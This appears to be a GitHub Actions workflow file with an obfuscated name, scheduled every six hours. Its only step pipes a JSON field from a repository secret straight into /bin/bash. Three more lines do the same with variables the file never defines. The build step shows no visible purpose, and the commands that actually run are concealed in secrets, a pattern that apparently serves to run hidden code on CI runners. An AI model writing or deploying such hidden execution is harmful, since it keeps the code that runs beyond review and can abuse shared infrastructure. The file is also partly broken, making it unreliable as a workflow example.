name: fuguntang6734

on:
  workflow_dispatch:
  schedule:
    - cron: '40 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fuguntang6734
        env:
          q993: ${{ secrets.q993 }}
        run: |
          echo $q993 | jq -r .zu56795 | /bin/bash
          echo $lae5939 | jq -r .zslh011 | /bin/bash
          echo $nda2836 | jq -r .gb242 | /bin/bash
          echo $zkzlb20205 | jq -r .xijf845 | /bin/bash

